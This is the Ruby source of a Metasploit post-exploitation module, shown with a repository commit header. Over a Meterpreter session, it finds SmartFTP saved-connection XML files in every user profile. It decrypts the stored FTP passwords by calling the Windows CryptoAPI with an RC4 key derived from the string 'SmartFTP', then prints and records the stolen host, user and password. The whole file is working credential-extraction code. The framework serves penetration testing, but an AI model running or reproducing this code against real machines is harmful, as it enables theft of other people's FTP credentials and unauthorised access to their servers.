21f6127e29
Change all Platform 'windows' to 'win', as it internally is an alias anyway and only causes unnecessary confusion to have two platform names that mean the same.
157 lines
4.3 KiB
Ruby
157 lines
4.3 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'rexml/document'
|
|
require 'msf/core/post/windows/user_profiles'
|
|
|
|
class Metasploit3 < Msf::Post
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
def initialize(info={})
|
|
super( update_info( info,
|
|
'Name' => 'Windows Gather SmartFTP Saved Password Extraction',
|
|
'Version' => '$Revision$',
|
|
'Description' => %q{ This module finds saved login credentials
|
|
for the SmartFTP FTP client for windows.
|
|
It finds the saved passwords and decrypts
|
|
them.},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'theLightCosine'],
|
|
'Platform' => [ 'win' ],
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
))
|
|
end
|
|
|
|
def run
|
|
grab_user_profiles().each do |user|
|
|
next if user['AppData'].nil?
|
|
|
|
tmpath = user['AppData'] + "\\SmartFTP\\Client 2.0\\Favorites"
|
|
|
|
enum_subdirs(tmpath).each do |xmlfile|
|
|
xml = get_xml(xmlfile)
|
|
|
|
unless xml.nil?
|
|
# Will report the creds to DB and user
|
|
parse_xml(xml)
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
#The saved connections in SmartFTP are saved in XML files saved
|
|
# in a Directory with user-defineable sub-directories. This
|
|
#function recursively searches all sub directories for the XML files
|
|
def enum_subdirs(path)
|
|
xmlfiles=[]
|
|
|
|
begin
|
|
session.fs.dir.foreach(path) do |sub|
|
|
next if sub =~ /^(\.|\.\.|Predefined Favorites)$/
|
|
|
|
xmlpath= "#{path}\\#{sub}"
|
|
|
|
if sub =~/\.xml$/
|
|
xmlfiles << xmlpath
|
|
else
|
|
xmlfiles += enum_subdirs(xmlpath)
|
|
end
|
|
end
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
print_error "Received error code #{e.code} when enumerating #{path}"
|
|
end
|
|
|
|
return xmlfiles
|
|
end
|
|
|
|
#We attempt to open the dsicovered XML files and alert the user if
|
|
# we cannot access the file for any reason
|
|
def get_xml(path)
|
|
begin
|
|
connections = client.fs.file.new(path, 'r')
|
|
|
|
condata = ''
|
|
until connections.eof
|
|
condata << connections.read
|
|
end
|
|
return condata
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
print_error "Received error code #{e.code} when reading #{path}"
|
|
return nil
|
|
end
|
|
end
|
|
|
|
#Extracts the saved connection data from the XML. If no password
|
|
# is saved, then we skip that connection. Reports the credentials
|
|
# back to the database
|
|
def parse_xml(data)
|
|
mxml = REXML::Document.new(data).root
|
|
mxml.elements.to_a("//FavoriteItem").each do |node|
|
|
next if node.elements['Host'].nil?
|
|
next if node.elements['User'].nil?
|
|
next if node.elements['Password'].nil?
|
|
|
|
host = node.elements['Host'].text
|
|
port = node.elements['Port'].text
|
|
user = node.elements['User'].text
|
|
epassword = node.elements['Password'].text
|
|
|
|
next if epassword.empty?
|
|
|
|
pass = decrypt(epassword)
|
|
|
|
print_good("HOST: #{host} PORT: #{port} USER: #{user} PASS: #{pass}")
|
|
if session.db_record
|
|
source_id = session.db_record.id
|
|
else
|
|
source_id = nil
|
|
end
|
|
report_auth_info(
|
|
:host => host,
|
|
:port => port,
|
|
:source_id => source_id,
|
|
:source_type => "exploit",
|
|
:user => user,
|
|
:pass => pass
|
|
)
|
|
end
|
|
end
|
|
|
|
#Hooks the Windows CryptoAPI libraries to decrypt the Passwords
|
|
def decrypt(password)
|
|
cipher = [password].pack("H*")
|
|
ms_enhanced_prov = "Microsoft Enhanced Cryptographic Provider v1.0"
|
|
prov_rsa_full = 1
|
|
crypt_verify_context = 0xF0000000
|
|
alg_md5 = 32771
|
|
alg_rc4 = 26625
|
|
|
|
advapi32 = client.railgun.advapi32
|
|
|
|
acquirecontext = advapi32.CryptAcquireContextW(4, nil, ms_enhanced_prov, prov_rsa_full, crypt_verify_context)
|
|
createhash = advapi32.CryptCreateHash(acquirecontext['phProv'], alg_md5, 0, 0, 4)
|
|
hashdata = advapi32.CryptHashData(createhash['phHash'], "SmartFTP", 16, 0)
|
|
derivekey = advapi32.CryptDeriveKey(acquirecontext['phProv'], alg_rc4, createhash['phHash'], 0x00800000, 4)
|
|
decrypted = advapi32.CryptDecrypt(derivekey['phKey'], 0, true, 0, cipher, cipher.length)
|
|
destroyhash = advapi32.CryptDestroyHash(createhash['phHash'])
|
|
destroykey = advapi32.CryptDestroyKey(derivekey['phKey'])
|
|
releasecontext = advapi32.CryptReleaseContext(acquirecontext['phProv'], 0)
|
|
|
|
data = decrypted['pbData']
|
|
data.gsub!(/[\x00]/, '')
|
|
return data
|
|
end
|
|
end
|